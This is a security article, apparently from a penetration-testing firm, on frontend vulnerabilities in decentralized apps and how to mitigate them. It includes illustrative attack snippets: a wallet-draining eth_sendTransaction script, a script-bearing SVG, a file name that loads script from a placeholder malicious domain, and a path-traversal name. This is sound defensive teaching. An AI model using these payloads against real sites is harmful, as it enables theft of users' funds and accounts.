dApps often mimic traditional web applications, with a frontend and a backend layer; in the blockchain space, however, the backend is often primarily a set of smart contracts. Nowadays there are also plenty of hybrid solutions, where part of the application state is held in smart contracts and part in a traditional database, cache, or filesystem.
A dApp frontend is usually built using JavaScript frameworks such as React, Vue, or Angular, just like traditional web applications. It typically interacts with blockchain nodes via web3 libraries, may contain wallet widgets or wallet integrations such as Privy, and may authenticate users with wallet signatures; in other respects it resembles a regular frontend, focusing mainly on the UI/UX side of the application.
It is common to assume that all hacks originate from the backend, where "the meat" is. This is not true: client-side attacks against frontends and their users can be as damaging as backend compromises, leading to consequences such as drained wallets, manipulated transactions, and stolen assets. So, if you want to keep your dApp secure, or learn how to test its security, read on. We will discuss:
- Predictable or hardcoded signing message
- Exposed secrets
- Client vs server-side and Security by obscurity
- Unsanitized user-controlled input
- Lack of SRI hashes for external scripts
- Direct IP access
- Missing or insecure CSP implementation
- Disclosing sensitive information in errors/3rd party API requests
- Unrestricted upload to IPFS/Decentralized hosting
Predictable or hardcoded signing message
One of the authentication methods used in dApps is to obtain a user signature and use it as the user's session identifier. Since the signature allows derivation of the user's public key (address), it works well as a unique session ID and at the same time identifies who the user is, without a need for additional encryption or other tokens.
This approach, however, has some downsides. The main tradeoffs of such a design are the lack of two-factor authentication and the lack of dynamic session management (invalidation, timeout), unless these are implemented on top of the pure signature authentication.
Additionally, there is a bigger risk related to the signatures themselves. If the message to be signed is predictable or hardcoded, an attacker may create a phishing site (or obtain the signature in a similar way) and then reuse it as an authentication token, impersonating the victim.
Consider the following login message to be signed:
// An example of the signing message
const message = "I am logging in to the secure dApp";
As highlighted above, there is nothing stopping an attacker from obtaining such a signature with a fake site and then reusing it. Additionally, such an authentication method does not allow control of a timestamp or session timeout, or adding 2FA on top of it.
It is not a problem to use the above mechanism for an app that uses the blockchain as a read-only data source and merely aggregates public user data to display it in the application UI, or that acts only as an intermediary between the user's wallet and blockchain RPCs.
However, if an application keeps and processes user data or PII, manages transactions, stores funds, or in any way uses the session ID to let the user manage anything sensitive such as funds or data, then pure signature-based authentication is not enough, and mature, battle-tested frameworks should be used for authentication and authorization.
Exposed secrets
During numerous security assessments, we identified secrets exposed in JavaScript files. Sometimes this is just a mistake, but often the application architecture shows that developers do not understand how client-side data is processed versus server-side: environment variables that should stay secret are prefixed with NEXT_PUBLIC, which in Next.js automatically exposes them to the client, or a component such as AWS authentication is added without anyone realizing it will be visible in the user's browser (essentially the same mistake). Below you can see some of the cases we found during audits and penetration tests.
Rule no. 1: NEVER reinvent the wheel in security.
In dApps whose authorization is based on JWT tokens, custom implementations are often used.
This opens up a variety of attack vectors, including signature forging, a missing signature check, a weak secret, and others that we have already described in the JWT article.
API keys
dApps rely on many external integrations, and API keys that should never appear client-side can end up exposed. The impact on the application differs depending on the key: if a crucial secret is exposed, the entire backend may be at risk, and malicious users may perform unauthorized actions.
// Common examples
const BACKEND_API_KEY = "sk_live_51HaBC...";
const NEXT_PUBLIC_ADMIN_SECRET = "supersecret123";
const INTERNAL_API_TOKEN = "Bearer eyJhbGc...";
// Other services
const FIREBASE_API_KEY = "AIzaSyA...";
// AWS credentials
const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";
const AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY";
Client vs server-side and Security by obscurity
Instead of using battle-tested authentication frameworks, some applications choose an obscure, custom, client-side way of storing secrets. "Security by obscurity" is a common term for a design anti-pattern where software relies on the attack surface being hidden; once it is uncovered, there is no defense.
For instance, in one case an application was using a client-side generated session ID. The problem is that the first question an attacker will ask is: where does the authentication come from? If it clearly appears to be generated client-side, compromise is a matter of when, not if, especially in the AI age, where reverse engineering of client-side JavaScript can be done in minutes.
In summary, many different keys and secrets can be exposed in a dApp frontend, so it is crucial to test the entire application for exposed keys before deploying it to production.
From a black-box perspective, this can be achieved using a proxying tool (such as Burp Suite) to map the entire application and then searching the proxy history for secrets. Extensions such as the Trufflehog integration can also help.
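The same idea can be automated against downloaded bundles. Below is a minimal sketch of pattern-based secret scanning; the regexes are illustrative and far from exhaustive (dedicated tools such as Trufflehog ship much larger rule sets).

```javascript
// Illustrative secret patterns — a real scanner needs many more rules.
const SECRET_PATTERNS = [
  /AKIA[0-9A-Z]{16}/g,          // AWS access key ID
  /sk_live_[0-9a-zA-Z]{10,}/g,  // Stripe-style live secret key
  /AIza[0-9A-Za-z_-]{35}/g,     // Google/Firebase API key
];

// Return every substring of `source` that matches a known secret pattern.
function findSecrets(source) {
  const hits = [];
  for (const pattern of SECRET_PATTERNS) {
    for (const match of source.matchAll(pattern)) hits.push(match[0]);
  }
  return hits;
}

const bundle = 'const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";';
console.log(findSecrets(bundle)); // [ 'AKIAIOSFODNN7EXAMPLE' ]
```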
Unsanitized user-controlled input
Another very common misconfiguration in dApps is that the application accepts user-controlled input and does not sanitize it later. Such a misconfiguration can lead to different classes of attacks, but we would like to focus on Cross-Site Scripting (XSS), which directly affects the dApp frontend.
XSS is an ancient and well-known issue, but for those who are not familiar with it: it happens when a user is able to inject scripts into the application. This may happen in a reflected manner (when a URL parameter is dynamically displayed as part of the website and may contain a script) or in a stored manner, where the payload is saved somewhere, e.g. in a comment, and later displayed as HTML/JS.
The reality is that XSS in dApps can be even more devastating than in traditional web applications. Unlike traditional applications, where XSS is mainly associated with stealing cookies or session tokens, XSS in dApps can directly interact with wallet providers. An attacker can craft a script that calls ethereum.request({method: 'eth_sendTransaction', params: […]}) to prompt users to send funds. Since users are conditioned to approve wallet prompts in dApps, they are more likely to approve a malicious transaction.
When malicious scripts execute in the context of a decentralized application, they can:
- inject transaction prompts,
- perform keylogging,
- steal user sessions,
- access private keys stored in local storage,
- perform social engineering via wallet prompts.
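As an illustration of the first point, an injected script can drive the wallet provider directly. The sketch below uses illustrative values (the attacker address is a placeholder); `window.ethereum` is the EIP-1193 provider object injected by wallets such as MetaMask.

```javascript
// What an injected script could attempt: prompt the victim's wallet to
// send 1 ETH to an attacker-controlled address. Purely illustrative.
const ATTACKER_ADDRESS = "0x000000000000000000000000000000000000dEaD";

async function maliciousPrompt() {
  // Only runs in a browser with a wallet extension installed.
  if (typeof window === "undefined" || !window.ethereum) return;
  const [victim] = await window.ethereum.request({ method: "eth_requestAccounts" });
  await window.ethereum.request({
    method: "eth_sendTransaction",
    params: [{ from: victim, to: ATTACKER_ADDRESS, value: "0xde0b6b3a7640000" }], // 1 ETH in wei
  });
}
```

The victim sees a perfectly genuine wallet pop-up, served from the legitimate dApp origin, which is exactly why this class of XSS is so dangerous.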
A few not-so-obvious places where XSS can be found in dApps are token or transaction names and fields. For instance, a tx memo on some chains can be used to deliver a script, and a few block explorers used to render token names without any sanitization, leading to XSS.
To prevent this kind of scenario, it is crucial to map every possible "input", especially when processing raw blockchain data, and to always use sanitization libraries such as DOMPurify. Moreover, do not use raw-HTML-exposing functions such as dangerouslySetInnerHTML, and apply CSP (described below).
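For contexts where attacker-influenced blockchain data (such as a token name) is rendered as plain text, even simple escaping defeats the payload. The helper below is an illustrative sketch, not a full sanitizer; in practice, prefer a maintained library such as DOMPurify.

```javascript
// Minimal HTML-escaping sketch: maps the five characters that can break
// out of a text context into their HTML entities. `&` must be first.
function escapeHtml(untrusted) {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// An illustrative malicious token name fetched from chain data.
const tokenName = '<script>alert(document.domain)</script>SafeToken';
console.log(escapeHtml(tokenName)); // the tags render as text, not as a script
```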
Lack of SRI hashes for external scripts
Speaking of unsanitized user input, its impact is the execution of arbitrary JavaScript. But there is also another way malicious JS can be smuggled into your application.
Modern decentralized applications rely heavily on external JavaScript libraries, such as web3.js, ethers.js, wallet connectors and third-party providers, as well as various UI frameworks, which are loaded from CDNs. The problem is that once they are hosted on a third-party server, someone else is responsible for their security. And accidents happen. If a widely used library is compromised, e.g. through compromised access to an S3 bucket, a git repo, or any other way, its content may be hijacked (see the web3.js case).
How to defend against an external script's content suddenly being changed to something else? The answer is Subresource Integrity (SRI) hashing. In short, the developer calculates a hash of a third-party library and attaches it to the page source. Browsers must obey that hash: if the third-party file's content does not match it, the file is not loaded. SRI thus allows browsers to verify that files fetched from CDNs haven't been tampered with, by comparing their cryptographic hash against a known value.
Without Subresource Integrity, attackers who inject malicious code into these trusted libraries get their JS executed within the dApp's context.
// Vulnerable - no SRI hash
<script src="https://cdn.jsdelivr.net/npm/web3@latest/dist/web3.min.js"></script>
<script src="https://unpkg.com/ethers@5.7.0/dist/ethers.umd.min.js"></script>
Properly implemented web3-related libraries should look like the following.
// Web3.js from CDN with SRI hash
<script
src="https://cdn.jsdelivr.net/npm/web3@1.10.0/dist/web3.min.js" integrity="sha384-smhZkYF5HmmdsSfjP+W3SxXOJLjXo1Y6l5t7H/9Yxjnax3ktyJjdS3ZkJ8UKNGwu"
crossorigin="anonymous">
</script>
// Ethers.js from CDN with SRI hash
<script src="https://cdn.jsdelivr.net/npm/ethers@5.7.2/dist/ethers.umd.min.js" integrity="sha384-R6nFvLKfBGJLxfqiKLPf6UqkQqzNJiH7D8cZr9B5Lt+fvGr3Y2B6s0F5J9uZxF3g"
crossorigin="anonymous">
</script>
From a testing perspective, reviewing all <script> and <link> tags in the HTML source code to identify missing integrity attributes should form part of every standard assessment.
Direct IP access
Most web applications are designed to be accessed via their domain names, e.g. https://example-dapp.com. This also allows setting up a WAF (Web Application Firewall) that enforces rate limits and provides a decent level of protection against basic exploits.
However, many of them fail to properly restrict access via a direct IP address, e.g. the above application could also be reachable at http://192.168.0.12.
This allows attackers to bypass the WAF by connecting directly to the server's IP address. Direct IP access should be strictly forbidden.
To catch this bug during a security assessment, a tester may use OSINT techniques, resolve the DNS name to an IP address, and attempt to connect to the application directly using it. Additionally, search engines such as Shodan, FOFA, and Censys may help.
Missing or insecure CSP implementation
A very common and often-identified mistake is a missing or insecure implementation of the Content Security Policy (CSP) header. This is one of the most valuable security headers: it mainly prevents Cross-Site Scripting (XSS) attacks by controlling which resources can be loaded and executed on the web page.
As previously discussed, XSS has a more severe impact in dApps, so implementing this security header is especially important.
Implementing CSP correctly in a dApp environment can be frustrating because the app needs to interact with wallet browser extensions and load resources from third-party services or IPFS gateways, so defining which scripts are allowed and which are not can easily turn into dependency hell. This often leads developers to skip CSP entirely or configure it so permissively that there is no real protection. An example of a permissive CSP header is shown below.
Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.amazonaws.com https://*.googleapis.com https://*.walletconnect.com
There are a few misconfigurations here:
- unsafe-inline in script-src directive — allows inline JavaScript to execute and completely defeats the primary purpose of CSP (most XSS rely on injecting inline scripts),
- unsafe-eval in script-src directive — is also unsafe because it allows the use of dangerous functions like eval(),
- wildcards (*) in the whitelisted domains are problematic — in the above example, any attacker can register their own S3 bucket and host malicious content that would be authorized by this CSP.
To implement CSP correctly, review all the directives that should be set and whitelist only the exact domains needed, without wildcards.
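For comparison, a stricter policy might look like the following sketch. The origins are purely illustrative — substitute the exact CDNs, RPC endpoints, and wallet relays your app actually uses (the header is sent as a single line; it is wrapped here for readability).

```
Content-Security-Policy: default-src 'self';
  script-src 'self' https://cdn.jsdelivr.net;
  connect-src 'self' https://mainnet.infura.io wss://relay.walletconnect.com;
  object-src 'none';
  base-uri 'self';
  frame-ancestors 'none'
```

Note the absence of 'unsafe-inline', 'unsafe-eval', and wildcards: each allowed origin is spelled out in full.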
Content Security Policy is one of the most powerful defenses against XSS but is consistently misimplemented in dApps. From a testing perspective, always check for the presence and content of CSP headers in HTTP responses. To check whether a CSP is effective, an online evaluator such as Google's CSP Evaluator can be used.
Disclosing sensitive information in errors/3rd party API requests
Under the hood, an application frontend may fetch its components from various data sources: other subdomains of the application, S3 buckets, or third-party services. Those requests are normally not visible to users, but a hacker or pentester using a tool such as Burp Suite easily sees them all.
It may happen that some of those requests silently disclose sensitive information in error messages or other server responses. It may also happen that they disclose sensitive information FROM users to analytics. One of the security myths is that analytics are generally trusted or harmless; yet there has already been a hack where, while nothing was officially confirmed, everything pointed to potential insiders watching the analytics.
One example is disclosing an internal GraphQL instance in an error message like the following.
HTTP/1.1 500 Internal Server Error
Server: nginx/1.18.0 (Ubuntu)
{"success":false,
"error":{"code":"INTERNAL_SERVER_ERROR","message":"Failed to fetch vaults, Error: All GraphQL endpoints failed: {\"response\":{\"errors\":[{\"message\":\"All GraphQL endpoints failed\",\"extensions\":{\"code\":\"LOAD_BALANCER_ERROR\",\"details\":\"GraphQL errors at https://graph_name.example.com/subgraphs/id/12345
t: [{\\\"message\\\":\\\"Failed to decode `Bytes` value: `Invalid character '\\\\\\\\'' at position 0`\\\"}]\"}}]}
Access to the GraphQL instance was open to anyone, meaning the full schema could be retrieved, potentially exposing undocumented GraphQL queries or mutations.
Requests sent to analytics should never contain any sensitive information such as API keys, access tokens, or secrets. An example of an improperly configured analytics API request is presented below:
POST /api/v1/analytics HTTP/2
Host: example.com
{"timestamp":"timestamp_value",
"action":"page_hit",
"version":"1",
"session_id":"UUID",
"payload":"{\"user-agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36\",\"locale\":\"en-US\",\"location\":\"en-US\",\"referrer\":\"\",\"pathname\":\"/\",\"href\":\"https://example.com/#access_token=eyJhbGciOiJIUzI1NiIsImt[REDACTED]u0w&expires_at=1767176231&expires_in=3600"}"}
To identify such misconfigurations, it is essential to test all dApp-related endpoints and inspect all traffic generated while using the application, including traffic exchanged with 3rd party services.
Unrestricted upload to IPFS/Decentralized hosting
Many decentralized applications use IPFS or static data storage such as S3 to store user-associated data, such as profile images or user-generated content.
It is common to see the validation of uploaded files implemented only on the client side: the JavaScript in the user's browser checks whether the image is valid and then issues a request to an endpoint that saves it to IPFS, S3, or another place. This pattern is vulnerable to several potential issues:
Client-side validation
As mentioned above, the proper validation should take place on the server side, i.e. in the backend. The image shouldn't be sent straight to IPFS or S3 with the access credentials processed in the user's browser's JavaScript. Instead, the image should be sent to the backend, which acts as an intermediary, validates the file (size, type — both content and MIME type — name, and extension), and only then forwards it to storage, while the storage access credentials stay on the server side.
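The server-side check described above can be sketched as follows. The helper name, size limit, and allow-list are illustrative assumptions; a production backend would typically also use a dedicated file-type detection library.

```javascript
// Hypothetical backend-side validation before forwarding a file to storage.
const MAX_SIZE = 2 * 1024 * 1024; // illustrative 2 MiB limit
const ALLOWED_EXT = new Set(["png", "jpg", "jpeg"]);
const MAGIC = {
  png: [0x89, 0x50, 0x4e, 0x47], // PNG signature
  jpg: [0xff, 0xd8, 0xff],       // JPEG signature
  jpeg: [0xff, 0xd8, 0xff],
};

// Accept the file only if size, extension, and leading magic bytes all agree.
function validateUpload(filename, buffer) {
  if (buffer.length === 0 || buffer.length > MAX_SIZE) return false;
  const ext = (filename.split(".").pop() || "").toLowerCase();
  if (!ALLOWED_EXT.has(ext)) return false;
  return MAGIC[ext].every((byte, i) => buffer[i] === byte);
}

// Right extension, wrong content (an SVG pretending to be a PNG) — rejected.
console.log(validateUpload("avatar.png", Buffer.from("<svg></svg>"))); // false
console.log(validateUpload("avatar.png", Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d]))); // true
```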
XSS in image upload
A common issue is to allow all types of images, including a special type: SVG. In contrast to other binary-structured formats, SVG consists of plain XML and may contain scripts or anchors to remote content. An example SVG image may look like this:
<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
<rect width="124" height="124" rx="24" fill="#000000"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
Depending on how it is later displayed in the application, this may lead to cross-site scripting (XSS).
If the decentralized hosting allows any kind of content to be uploaded, it can also be used by attackers to distribute malicious files as part of their campaigns.
Lack of filename validation
If the application uses the filename directly, this opens up a wide attack surface related to how the file will ultimately be saved. For instance, if the user is able to control the extension, it may lead to saving an executable file or, in the worst case, to compromise of the server, if a server-side executable is saved and run in the server's context.
Less damaging are cases where the user can control just the name, which may allow injecting HTML/JS code into it, for instance saving a file as:
abc<script src="https://maliciousdomain/1.js"/>def.png
Another risk is overwriting content on the server by manipulating the file path, using the well-known parent-directory pattern, for instance:
../../user2/profile.png
The above file name could lead to overwriting another user's content, if server permissions are not set correctly and the path traversal is not sanitized.
Conclusion
There is always a number of less common, unexpected, or logic-based security issues that are difficult to cover in one article. However, mitigating everything described above could greatly minimize your dApp's attack surface. To summarize:
- Understand your authentication model and whether it is secure for users
- Recognize what is server-side and what is client-side code. Remember that any client-side control can be bypassed by intercepting HTTP traffic and speaking directly to the server, without the JavaScript being rendered
- Scan for potential secrets in the client-side code. The less it reveals, the smaller the attack surface. Be very cautious when processing sensitive user data, especially private keys or access tokens
- Deploy a WAF in front of the production application and make sure it cannot be reached via a secondary IP or outside of the official application domain
- Implement standard hardening: Content Security Policy and SRI are your greatest allies
- Be careful when allowing users to upload files — this is a large attack surface with many pitfalls
…and if you require a comprehensive and reliable security assessment of your dApp, please contact us via our website.